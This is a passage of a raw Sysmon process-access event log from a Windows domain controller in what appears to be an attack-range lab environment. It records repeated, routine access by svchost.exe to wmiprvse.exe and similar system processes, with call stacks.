YSTEM32\ntdll.dll+51821 10341000x80000000000000004063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.894{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.894{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.894{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.894{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.894{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.863{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9